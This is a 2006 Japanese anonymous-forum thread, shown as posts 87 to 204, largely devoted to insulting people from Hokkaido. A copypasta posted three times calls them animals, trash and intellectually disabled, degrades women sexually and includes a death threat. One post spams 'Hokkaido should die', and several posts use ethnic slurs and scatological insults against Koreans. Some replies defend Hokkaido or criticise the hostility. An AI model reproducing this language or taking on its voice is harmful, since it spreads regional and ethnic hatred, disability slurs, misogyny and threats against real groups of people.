  .,,、  ,! .l゙,,,--. ‘'ー,,"''-、  | |.}.゙,!| |l゙.,r'"| |        | l゙ ,i´,i´ ゙l, ゙l、  ,-,_  __l゙ イ-'"゙゙,!   ヽ,ノ`^
  .゙l゙'ーー''" ,ン-‐'゜  .,,ニ_ ゙l  .| | |nl゙! V冖↓ .|__―、、 l゙ .|丿/`  ゙l |  .ヽ,,二〉‐'''゙二--―ーi、
   ゙'''''"゙} |    _,,__  `^   | |''''''ト l''''''''''| v-i、 .v--┘ | .レ /   | .|     / ,i´ l彡ッ!彡-―'′
      | .|,,,-''二―-rミ゙'-,   | | .ノ.,、 こ'-、| ,! .| |    ゙l `│   | l゙     ,l゙ l゙   ゙‐'`
     .,,l゙ .ン''゙_     ゙l │  .| |/ン} .| \ノ| |  | |     }, |    ,l゙ .l゙    .,i´l゙  ,,、
  .,r'L/_−  ゙lヽ    │ |   .| |‐′| │,,,,,.l゙ ,l゙  | .|     `″   ,/ ,/    ,l゙ .l゙  l゙ |
  .l゙ ´,,、,ヘ" |  ヽ,`ー-‐'゙_,,i´   | .二ニ,二,_`丿  | |           ,/,/    / │  .゙l.\,,,,,,,,,,,,,,,,-、、
  ‘゙゛ .゙i、 ,l゙   `゙'''''''"`    .| ,!   ._,-ン′  | .|     .,-'彡‐"      ゙l,丿    ゙'ー--------l゙
      `″            ゚''′   ゙‐'′    .゙‐'′     ゙゙^         ``



87 :ナナシズム:2006/02/28(火) 23:31:21 ID:nqpZDVSy
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん



88 :ナナシズム:2006/03/01(水) 00:03:32 ID:W76U0ktH
>87
匿名の時だけ強いのね

89 :ナナシズム:2006/03/01(水) 07:03:06 ID:b2Tbuwy7
ヒント:道民を半島民に変換

90 :ナナシズム:2006/03/01(水) 08:44:58 ID:AwuKARXV
ヒント


とか使ってる奴久しぶりにみたwww

91 :ナナシズム:2006/03/03(金) 23:36:10 ID:???
道央のあたりに行ってみたい
あと標津のあたりもいつか行きたい

92 :ナナシズム:2006/03/05(日) 16:13:14 ID:tdcDKY3l
各国の一人当たりGDP
 日本  36000ドル
 韓国  16000ドル
 北海道 15000ドル(推定)

93 :しゃもじ ◆yZmb0oKZNc :2006/03/06(月) 17:30:14 ID:uPwRsEFu
 >>91
 「道央のあたり」って札幌のあたりか?

94 :ナナシズム:2006/03/07(火) 00:14:51 ID:???
>>93
あそこを道央っていうの?十勝とかあのへんじゃねえのか

95 :ナナシズム:2006/03/09(木) 09:27:15 ID:???
まだ、このスレ落ちないでいたんだ・・・。

なかなかしぶとい事・・・。

96 :ナナシズム:2006/03/09(木) 16:35:22 ID:cQ4eg2Ll
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん

97 :ナナシズム:2006/03/10(金) 18:25:42 ID:???
ここで北海道叩きするのは、日本を分裂させようと必死な在日チョン


98 :ナナシズム:2006/03/11(土) 17:28:41 ID:b50ybrNM
>96
道民バージョンとか高卒バージョンあるね
単純馬鹿w

99 :ナナシズム:2006/03/24(金) 01:10:54 ID:Oxd3uR/t
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん


100 :ナナシズム:2006/03/24(金) 01:46:48 ID:/L7S7X5h
北海道だろうが九州だろうが


       韓 国 と 比 べ れ ば ネ申

101 :ナナシズム:2006/03/24(金) 05:27:06 ID:POA3Gyor
>99
お前は去勢されてるだろ?
(=^▽^=)






ウンコ臭いんだよw

102 :ナナシズム:2006/04/04(火) 21:24:10 ID:f78aMuZ0

  ___                  :;              ∵
         / _/_ | |    \  /        \((从⌒从*)) /
       |/    /   ―――   /   *    #((  :: ) ( ⌒ ζ * / ・
       /  / /  |         /      \曝ク  ∵ ━(( : ∂ ))  /
    (  ))                    \ (( § ) ⌒;  lll ;从 *(・)/
  ((  ⌒  ))__∧_∧___//       * 煤@;  ) (( ‡ *   ζ  ∵―
 ((   (≡三(_( ´∀`)__( 三三三三三三三三(( 从 ( >> ; : ) ¢) )―
  (( ⌒ ))    (  ニつノ   \`        : *煤i( 从 1((  )) *ヽ\ ヽ・
  (( )      ,‐(_  ̄l           : / / ・(( ;  :  )) (  ζ\*
          し―(__)                 / (__)W(__)_)W\    ・
           /|
        ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         >>83はいはい氏んでね!

http://academy4.2ch.net/test/read.cgi/sociology/1131200100

103 :ナナシズム:2006/04/06(木) 11:12:16 ID:Ff0P3eLN
お前札幌きたことあんのか?お前の近親相関の村なんかより百倍いいぞ。



き た こ と な い のに しゃしゃんなよ糞がき。てめーの知的障害の両親と兄弟よりましだ

104 :ナナシズム:2006/04/06(木) 18:50:46 ID:GXdae3if
本当の原因を知らないから、他人のせいにする
本当の原因を知りたくないから、他人のせいにする
貴方は、教えられた常識をそのまま鵜呑みにしてませんか?

感情自己責任論@心理学板
http://academy4.2ch.net/test/read.cgi/psycho/1135930869/1-3

105 :ナナシズム:2006/04/07(金) 05:13:59 ID:???
札幌なめんな糞がき

106 :ナナシズム:2006/04/07(金) 12:47:23 ID:4AaPHSCS
道民の地元偏重は異常

107 :0@:2006/04/07(金) 16:19:49 ID:zAAzK4B1
北海道は空気が清んでいてとても綺麗だ。俺は好きだな

108 :ナナシズム:2006/04/15(土) 17:14:07 ID:wCK+i7F7
あほっ♪あほっ♪あ、ほっかいどう♪


109 :ナナシズム:2006/04/15(土) 20:27:08 ID:a37aLBZn
↑何かイヤな事でもあったんですか?
深刻な悩みを抱えてるとかですか?

110 :ナナシズム:2006/04/15(土) 20:40:37 ID:???
♪(*^ ・^)ノ⌒>108
阿呆は捨てます。

111 :ナナシズム:2006/04/20(木) 09:55:12 ID:7hdA03VE
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね
北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね北海道は死ね


112 :ナナシズム:2006/04/20(木) 14:47:22 ID:L+k85hlH
>111
┐(´ー`)┌

113 :ナナシズム:2006/04/22(土) 10:15:52 ID:mmlyP7te
>111
ウンコ喰い過ぎじゃね?

114 :道民:2006/04/26(水) 13:28:44 ID:59QDwcmv
ニートで童貞の26です
北海道から出たのは修学旅行だけ

115 :ナナシズム:2006/04/27(木) 01:24:03 ID:3fefS/xP
日本から独立したいね。
自給自足もできるし、外国人もどんどん入れて人口を増やして、外国資本の産業を誘致。
日本国には米軍基地用の土地を貸して土地代を頂く、
この際、HOKKAIDOとしてアメリカの一州になるのもいいなあ。
日本国に属しているより安心かもしれない。

116 :ナナシズム:2006/04/27(木) 16:05:06 ID:???
産業用機械が人間の代わりに食糧や生活必需品を全て生産し、輸送することが
できるようになったら、人間は働かなくても生きていけるようになる。

そうしたら通貨を廃止することはできるよね。

○wiki
http://wiki.livedoor.jp/tuuka_haisi/d/FrontPage
○通貨廃止に必要なプログラム・技術資料等の配布サイト
http://tuuka-haisi.hp.infoseek.co.jp/

誰か身近にいるプログラムできる人間にやらせたらいいし。

117 :ナナシズム:2006/04/29(土) 10:02:45 ID:rl6HLycT
北海道を離れ、東京で生活してる俺は、
帰郷すると変人扱いされる
あの道民性は異常だ
離れてみるとよくわかる

118 :ナナシズム:2006/04/29(土) 10:07:17 ID:rl6HLycT
それから札幌でも方言というか、独特の訛りがある
変な抑揚があるのですぐわかるw

119 :ナナシズム:2006/04/29(土) 10:15:39 ID:rl6HLycT
まああれだ、北海道は正に松山千春みたいにエラソーな態度で
排他的オレサマ自慢を語るな人間ばかり。あーウザイ

120 :ナナシズム:2006/04/30(日) 08:24:27 ID:???
母が北海道出身で、わたしは東京育ち。むこうの人は肌キレイだし☆憧れるなー(ノ∀`)

121 :ナナシズム:2006/04/30(日) 14:53:48 ID:vzSO8Cs2
北海道って日本のお荷物

122 :ナナシズム:2006/05/02(火) 08:30:25 ID:90mQJfkg
なにもしないでくれくればかり
左翼政党が道民のやる気をスポイルさせてしまった
今後は格差をなくせ!を合言葉に弱者マファア路線を一層強めるな
税金はじゃんじゃん上がる
正直者がバカを見る平等指向社会に逆行しないよう
左を向いた道民に注意しましょう

123 :ナナシズム:2006/05/02(火) 10:44:11 ID:VbgCFHIM
アカヒより赤い北海道新聞
目を覚ませ!

124 :ナナシズム:2006/05/05(金) 02:32:24 ID:eCOTDi/4
必死だな、道産子。

あー弱者いびりは楽しいねえ。
由緒正しい日本人でなければできない遊びだよ。
まあ、嗜みのひとつって事で。

お前らは俺らの気分で運命すら左右される
野蛮人と罪人のなれの果てなんだよ。
悔しいか?理不尽か?そうだろうなあ。

でもそれはお前らが悪いんだよ。
少数派で弱者だからな。
誰もお前らを守ってはくれない。
お前ら自身で自分の身すら守れない。

みじめだねえ。



125 :ナナシズム:2006/05/05(金) 09:20:54 ID:RSnlCR1W
すげー嫌われ者w

126 :ナナシズム:2006/05/05(金) 10:33:39 ID:UExX6ZNF
道民は自分たちが日本の最左翼ということに無自覚
やたらと補助金がつくのも異常
たかるしか能がないんか?組合さんよ!
みんなもっと怒れ!

127 :ナナシズム:2006/05/11(木) 20:52:57 ID:dvcyThiy
道産子はウザイよね

128 :ナナシズム:2006/05/15(月) 00:55:56 ID:8xBgsUzB
道民だが学力の低さと左翼が多いのは否めない
民主党議席多いしね

129 :ナナシズム:2006/05/15(月) 07:04:23 ID:qJT8tIne
俺はこれまで道民という言葉すら知らなかったが、
温泉板で不様に「温泉教授」をかばう道民という存在を
目の当たりにして、道民に戦慄してしまった。
本州の人間にはここまで偏狭なヤシはしない。

島国日本はそれでなくても偏狭な国民性だといわれる。
九州も気になるところだが、北海道は日本の中でさらに偏狭なのか?
なんとかならないもんかね。

130 :ナナシズム:2006/05/17(水) 20:11:55 ID:wXOPIrOs
北海道中華思想

131 :ナナシズム:2006/05/18(木) 00:06:53 ID:nvktEXUd
ど−せ馬鹿ですよ!
悪いか?メーワク掛けたか?ん−

132 :ナナシズム:2006/05/18(木) 00:32:21 ID:nosWL4Qk

































>1…

133 :ナナシズム:2006/05/18(木) 19:09:34 ID:ok0E+8mh
だがフーゾクの安さは魅力

134 :ナナシズム:2006/05/18(木) 19:11:14 ID:ok0E+8mh
タコ焼屋ってそれいつの話?

135 :ナナシズム:2006/05/18(木) 19:54:46 ID:ZUUEE5Xd
妹が修学旅行で北海道に行っています。

136 :ナナシズム:2006/05/31(水) 23:46:26 ID:j3CAtuDm
道産子がおおらかで親切というのは嘘
性格悪くて自己チューが多い

137 :ナナシズム:2006/06/01(木) 00:53:12 ID:698WlU4b
韓国人は
ウンコ食べちゃう
悲しい人々

138 :ナナシズム:2006/06/01(木) 00:55:16 ID:698WlU4b
韓国人はウンコ食い!反論禁止。

おい!こら!チョンwww

ウンコ食うなよ韓国人www

139 :ナナシズム:2006/06/04(日) 03:33:17 ID:cN6jGEsw
ってか北海道民全てとお前は話したことでもあるのか?


140 :ナナシズム:2006/06/04(日) 10:22:43 ID:???
あげんなハゲ!

141 :名無し:2006/06/04(日) 23:07:14 ID:b1ek6+Vq
本当に道民って救い用ない!とくに!役所 郵便局 かなり酷い 低レベル


142 :ナナシズム:2006/06/04(日) 23:27:15 ID:???
道民は愛想がない

143 :ナナシズム:2006/06/07(水) 23:03:11 ID:h2A5aPX7
左翼を移住させ独立させるべき。若いオナゴは売春するしかない、500円くらいでw
餓死者と凍死者であふれて日本に平和が訪れる

そんな夢を見ました

144 :ナナシズム:2006/06/07(水) 23:59:45 ID:???
北海道だけで独立すべきだなと思います
飯には困らないし冷熱発電来るしな

案外楽園

>>1
人生セックスレスか

145 :ナナシズム:2006/06/08(木) 00:06:20 ID:cHQsZA3a
追記すると家は寒さには強いんだよなぁ

だから凍死もあまりないなぁ


146 :ナナシズム:2006/06/08(木) 02:46:15 ID:EIVAzrK7
札幌はテメーの本州の糞地元より数倍いいとこだし。来たことねーくせにパソコン越しでシネよな

147 :ナナシズム:2006/06/08(木) 02:48:34 ID:EIVAzrK7
大体はスレ主どんだけ頭いいのよ。学歴いってみろよ。あ?あ?マジムカつく。

148 :ナナシズム:2006/06/08(木) 02:49:33 ID:EIVAzrK7
リ亜厨房乙

149 :ナナシズム:2006/06/08(木) 13:48:04 ID:???
札幌人は、埼玉県民のように東京に憧れる奴は少ない。大阪のように地元意識も少ない。
他県から見ると北海道って独特のイメージあるけど、札幌人は地方意識そんなない。
札幌市外の人間は別だけどね。札幌に憧れる。

150 :ナナシズム:2006/06/08(木) 20:33:21 ID:???
知恵遅れの戯言をスルー出来ないヤツがいるのが、北海道の人間として情けない…。

皆、内地の知恵遅れ共の低脳レスはスルーしてくれ。

151 :ナナシズム:2006/06/11(日) 11:33:43 ID:USPML2wE
150はいいフリこきだべ。なまらはんかくさいんでねーべかw
じょっぴんかって寝れってw
したっけ!

152 :ナナシズム:2006/06/11(日) 12:04:28 ID:v+V5VEg4
>>151
日本語でおk

153 :ナナシズム:2006/06/11(日) 16:32:08 ID:WADxn4w8
>>151道民の俺もわかんね

154 :ナナシズム:2006/06/11(日) 16:57:45 ID:???
>>151
じょっぴんw懐かしいww

155 :ナナシズム:2006/06/11(日) 21:29:40 ID:dx3D7FJH
>>151
きめぇ

156 :ナナシズム:2006/06/11(日) 23:12:05 ID:CWw9oBSi
きめぇ
と言う言葉が
きめぇ

157 :ナナシズム:2006/06/12(月) 19:15:23 ID:uXvF2e6u
北海道のラーメンがまずいのはわざと?

158 :ナナシズム:2006/06/12(月) 19:22:12 ID:UjldamdO
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50

サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50

サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50
サヨクこそが本当は平和主義者なんだよ。 分かるだろ!!
http://money4.2ch.net/test/read.cgi/seiji/1146053626/l50

159 :ナナシズム:2006/06/13(火) 12:02:44 ID:7pU/3dDE
>>157
ハゲドーマ
ドーミンは北海道のラーメンは日本の最高峰に君臨し
しかも日本人はみなそう思っていると勘違いしていて痛い

出張で上京するドーミンはやたらそれを強調するんだよ。味覚バカかwww

160 :ナナシズム:2006/06/13(火) 15:18:48 ID:wKWa0Lfl
まぁ、たしかに道歩いていると、今にも襲い掛かってきそーな、
おっかない、にーちゃんばっか、いるのは確かだな。

161 :ナナシズム:2006/06/21(水) 07:12:54 ID:KywXOGgl
でも、本当は北海道の雄大な自然という
イメージに憧れてるんだろ!
みんな、正直になれよ。

162 :ナナシズム:2006/06/26(月) 20:37:23 ID:w3qah6MG
北海道の自然は素晴らしい。なのに道民がおもいっきり糞

163 :ナナシズム:2006/06/26(月) 23:14:59 ID:VSnR+69u
あーあ…

164 :ナナシズム:2006/06/27(火) 01:17:18 ID:M6XhNhOG
九州、東京、千葉、札幌と移り住んできたが、札幌は最低の都市だ。文化のかけらもないくせに、
圧倒的な誇りを持っている。東京との格差も、下手すりゃ十年近く感じるし、
札幌にはなんにもないし、本当に中身の空っぽなクソ田舎だ。ドイツもコイツも頭悪いし、向上心ないし、目にも
自信が見えないし、なにやらせても適当でトロい。そしてそれを指摘したら怒る・・。
マジで愚かだ・・・。しかもそんなヤツに限って、北海道から出たことない。出る気もない。

「井の中の蛙」
とはうまく言ったもんだ。

そもそも、「来札」とか、「内地・道外」とか言ってる時点で保守的極まりない。
北海道は外国だ!さっさと日本から独立しちまえ!!くたばれ腐れ道産子!!
日本人らしさのないてめぇらなんか、日本人じゃねぇ!!死ね!!!!!

165 :ナナシズム:2006/06/27(火) 02:45:54 ID:q9vItdd0
飲み屋のネーチャンは東京から来た客になぜか冷たい
だが北海道を褒め讃え、東京の悪口を言うと会話が弾む傾向がある
お試しあれ

166 :ナナシズム:2006/06/27(火) 02:55:57 ID:q9vItdd0
東京に行ったことのある道民は、東京のすべてをボロクソに言う

そして必ず
「あんな所には住めない」
で締め括るw

馬鹿じゃねーの。てか臭いから来るなよ田舎者!サイロで遊んでろ!

167 :ナナシズム:2006/07/01(土) 08:39:10 ID:Osr9QK+A
反論禁止!

168 :ナナシズム:2006/07/01(土) 21:24:45 ID:lmscPmX6
みんな同じ人間じゃん。
白人とかから見れば差はないよ。

169 :ナナシズム:2006/07/04(火) 08:17:13 ID:e4o4aRLg
それは違う

170 :ナナシズム:2006/07/07(金) 16:25:12 ID:DrUUrk1j
保守

171 :ナナシズム:2006/07/12(水) 14:50:56 ID:???
>北海道の自然は素晴らしい。なのに道民がおもいっきり糞 

オレも1年近く単身赴任したけど、人はなぜか冷たいと思うことが多々
北海道は自然を慈しみに行くのはいいけど、住むのは絶対イヤ

172 :ナナシズム:2006/07/18(火) 08:20:06 ID:JeYTngkL
夕張市(笑)

173 :ナナシズム:2006/07/26(水) 06:28:38 ID:Qh5z4qPr
ラーメンまずっ

174 :ナナシズム:2006/07/28(金) 20:39:47 ID:/WKstLtB
みんな死ね!!!

175 :ナナシズム:2006/07/28(金) 21:13:10 ID:???
>>171
会社休み?

176 :ナナシズム:2006/08/05(土) 01:21:54 ID:4jiOyF4m
ジンギスカンはうまいが道民は嫌い

177 :新潟県民:2006/08/05(土) 02:38:43 ID:???
【前頭前野の異常】インターネットをやり過ぎると以下のことが起こります。
・キレやすい性格になる。
・協調性の低下。
・人をいじめたり、日常会話で暴力的な発言をする。
・羞恥心の欠如
・時間感覚の欠如
(深夜までずっと2ch)
・人の意見にすぐ理屈をこねる
・集中力の低下,ぼーとしてる時が多い。
・常に2chのことを考えたり、ネットがやめられない。
・学校や会社をサボり易くなる。
・世の中に対して悲観的になる。

↑どれに当てはまりますか?ネットはやめましょう。

178 :ナナシズム:2006/08/06(日) 22:29:01 ID:eBQCOg2w
マトンうまー

179 :ナナシズム:2006/08/26(土) 00:42:15 ID:AgqCgYzR
北海道はロシアの植民地になっちまえ!

180 :ナナシズム:2006/08/26(土) 02:01:11 ID:6XTJmccs
みんな性格悪いどーみんとしか会ってないんだよ。いいどーみんもいるよ。たぶん…

181 :ナナシズム:2006/08/26(土) 13:10:58 ID:mKeR1Pqv
ウンコ民族韓国人
ウンコ大好物
反論禁止
反論無理

182 :ナナシズム:2006/08/29(火) 12:01:02 ID:jAkoWbgW
>>151
>150はいいフリこきだべ。なまらはんかくさいんでねーべかw
>じょっぴんかって寝れってw
>したっけ!

150は格好つけだね。とっても中途半端で恥ずかしいよねw
鍵をかけて寝てしまいなさいw
それじゃぁね!

という意味

183 :名古屋人:2006/08/29(火) 12:35:23 ID:???
反論ぐらいさせてあげともいいのに(*´・ω・)(・ω・`*)ネー

お互い話し合おう(´・∀・`)(´・ω・`)

184 :ナナシズム:2006/08/29(火) 12:57:06 ID:FBojVQb1
北海道万歳!

185 :九州人:2006/08/29(火) 13:51:15 ID:???
どこ人も一緒だろ?
要はそのどこのやつがウザイとか言ってるやつが
一番ウザイんだからな・・・
それにどこ人がいいやつが多いとかどこ人がウザイの多いとか
血液型占い信じてるレベルだと思うけど・・・

186 :ナナシズム:2006/09/03(日) 16:58:04 ID:aQtxXT2i
全くわかっていないな

187 :マジマリオ ◆EomJtw1YrE :2006/09/05(火) 15:02:56 ID:YT/ooEKP
>>1
主義・主張を主とするこの板において、反論を禁止し、討論の場を無くそうとするのは勝手だが、この板に立てる必要性はない。

なぜなら、これはただ北海道の人々を中傷しているだけであり、このスレの内容は何の根拠にも基づいていないので主義・主張とは言わないし、中傷と主義・主張は同意義ではないからである。

188 :苫小牧セレブ ◆LcbOIIzvDU :2006/09/05(火) 16:47:24 ID:zUbfgyNX
あら、こんな所に素敵なスレが埋まってたのね。
お疲れさま(笑)




189 :ナナシズム:2006/09/05(火) 18:04:02 ID:Cm70J3Yu
道民には「北海道が一番」って思ってる人も多いそうだが、
それと同じくらい「北海道なんて大嫌い。早く外に出たい」
って都会(特に東京)に憧れてる人も多いと思う。

北海道の親戚は前者だが、北海道出身の友人は完全に後者。
あまりにも北海道が嫌いだったので、一生懸命勉強して
東京の大学に入ったそうだ。

そいつのまえでは北海道の話題とか出身地の話題はタブー。
そういう話すると明らかに不機嫌になり、出身地の北海道を
これでもかというくらい口汚く貶しまくる。

普段は温和で面白い奴なんだが、そういう話題の時は豹変。
北海道が大嫌いだけど「北海道出身」という事実は覆らないから
それが悔しくてしょうがないらしい。

本人曰く、北海道を馬鹿にしても怒らない(むしろ本人も一緒になってバカにする)が、
北海道出身者をひとくくりにしてバカにするのは許せないそうだ。

190 :苫小牧セレブ ◆LcbOIIzvDU :2006/09/05(火) 18:45:56 ID:zUbfgyNX
>>189
妄想っぽいお話ですね。
もし本当なら、その人は北海道でイジメかなんかにあったんでしょう。
こちらに移住してきた東京出身の私の知り合いにも居ますよ。
東京が大嫌いだって。




191 :苫小牧セレブ ◆LcbOIIzvDU :2006/09/05(火) 18:50:01 ID:zUbfgyNX
>>164
もっとお外に出ましょうね。
引きこもってないで。





192 :苫小牧セレブ ◆LcbOIIzvDU :2006/09/05(火) 19:06:24 ID:zUbfgyNX
本当にごめんなさい…。道民を代表して謝っておくわね。
全国の小作農に、こんなにひがまれてごめんなさい。

京都と違って開放的な都会気質でごめんなさい。
大阪と違って訛りがなくて共通語に近くてごめんなさい。
広島や仙台ではテレビ東京が映らないのに北海道で映ってごめんなさい。
福岡市は130万都市なのに札幌市は190万人も住んでてごめんなさい。
埼玉県の下水道普及率は60%台なのに北海道は90%台でごめんなさい。
鹿児島と違って「男尊女卑」的な男女差別もなくてごめんなさい。
部落も在日差別もなくて清々しい生活をしててごめんなさい。

皆さん、そんなに息苦しい生活をして
北海道にコンプレックスをお持ちなら早く住めばいいのに…。




193 :ナナシズム:2006/09/06(水) 04:42:46 ID:x9lygskY
>>1
北海道が羨ましいんだべ?www
まぁ、別に来る者拒まず、去る者追わず。そんな中傷、どーってことない。

北海道にはまだ歴史が浅い。これから何でも産まれてくるぞ。
指くわえて見てろよwww

194 :ナナシズム:2006/09/06(水) 04:52:36 ID:x9lygskY
>>82
えー…と。
本物のホッケ食ったことある?
チェーン系居酒屋なんかで出てくる変な開きじゃなくて。

凄いぞ。めちゃめちゃ美味しいから。

195 :ナナシズム:2006/09/06(水) 17:14:41 ID:BMUVxXwK
飯が食っていけるならどこに住んでもいい

196 :ナナシズム:2006/09/08(金) 16:41:38 ID:euZkQpMa
盛り場ななに夜は誰もいない。寂しい…

197 :ナナシズム:2006/09/15(金) 02:46:41 ID:B1eacCrc
札幌にはロクな外タレが来ない。文化の砂漠地帯や〜

198 :ナナシズム:2006/09/15(金) 09:20:20 ID:zdw+iEGQ
そもそも北海道に文化なんかねーだろ?札幌に住んでると、
心が空っぽになって、ホントに虚しくなるぜ・・・。ファミマが出来て騒ぐぐらいだしな・・・。

199 :ナナシズム:2006/09/15(金) 10:38:40 ID:B1eacCrc
因みにセイコーマートなんて田舎コンビニは東京には存在しないw

200 :ナナシズム:2006/09/15(金) 11:22:00 ID:???
アイアンメイデン来日決定!

10/25(水)東京 日本武道館 OPEN 18:00 / START 19:00
10/26(木)広島 郵便貯金ホール OPEN 18:30 / START 19:00 
10/28(土)東京 国際フォーラム 追加公演 
10/30(月)大阪 大阪城ホール OPEN 18:00 / START 19:00 
 10/31(火)名古屋 名古屋市民会館 OPEN 18:30 / START 19:00 
 


201 :ナナシズム:2006/09/15(金) 11:25:27 ID:???
http://www.loudpark.com/

ラウドパーク最高だよな

202 :ナナシズム:2006/09/15(金) 11:48:27 ID:???
http://www.fandango.co.jp/lumine/

こんなのが札幌にあればなあ・・・・毎日お笑いライブが見れるのにね

203 :ナナシズム:2006/09/15(金) 12:04:35 ID:???
札幌>フクオカンコク

204 :ナナシズム:2006/09/15(金) 15:05:42 ID:A8axPS1v
